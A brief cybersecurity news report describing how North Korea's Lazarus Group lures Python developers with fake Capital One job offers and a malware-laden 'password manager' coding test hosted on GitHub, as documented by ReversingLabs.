North Korean state-sponsored threat actor Lazarus Group is developing its own “fake hacking campaign,” researchers warn.
Lazarus has been creating fake LinkedIn accounts for years and posting fake job openings online. They offer their victims, often developers, attractive packages, high salaries and lots of perks. But instead of getting the job, these people only got malware after a few rounds of applications, often from .PDF files posing as job openings and the like.
Cybersecurity researchers at ReversingLabs now claim that Lazarus is still doing the same thing, but is now attacking Python developers with a fake code testing project.
Moving the WHOIS server
Apparently, the group would start the same way again – by posing as someone on LinkedIn. This time it would be Capital One bank. They would then host the malware on GitHub, disguising it as a password manager project. After that, they would find suitable victims and at some point – ask them to test their skills.
The “test” involves downloading and installing the password manager, then “hunting” for bugs. The whole thing must be completed within half an hour. The scammers claim that the limit prevents candidates from cheating, but ReversingLabs says it’s to prevent victims from spotting and acting on the ruse.
The malware acts as a downloader, allowing attackers to deploy secondary malicious code depending on the compromised environment. The campaign is called “VMConnect Campaign” and has been active since August 2023, more than a year now. ReversingLabs believes the campaign is still ongoing.
North Koreans typically target developers working on cryptocurrency projects because they can steal people’s money and use it to fund the country’s state apparatus and weapons program. One of Lazarus’ largest heists netted them more than half a billion dollars.
Via BleepingComputer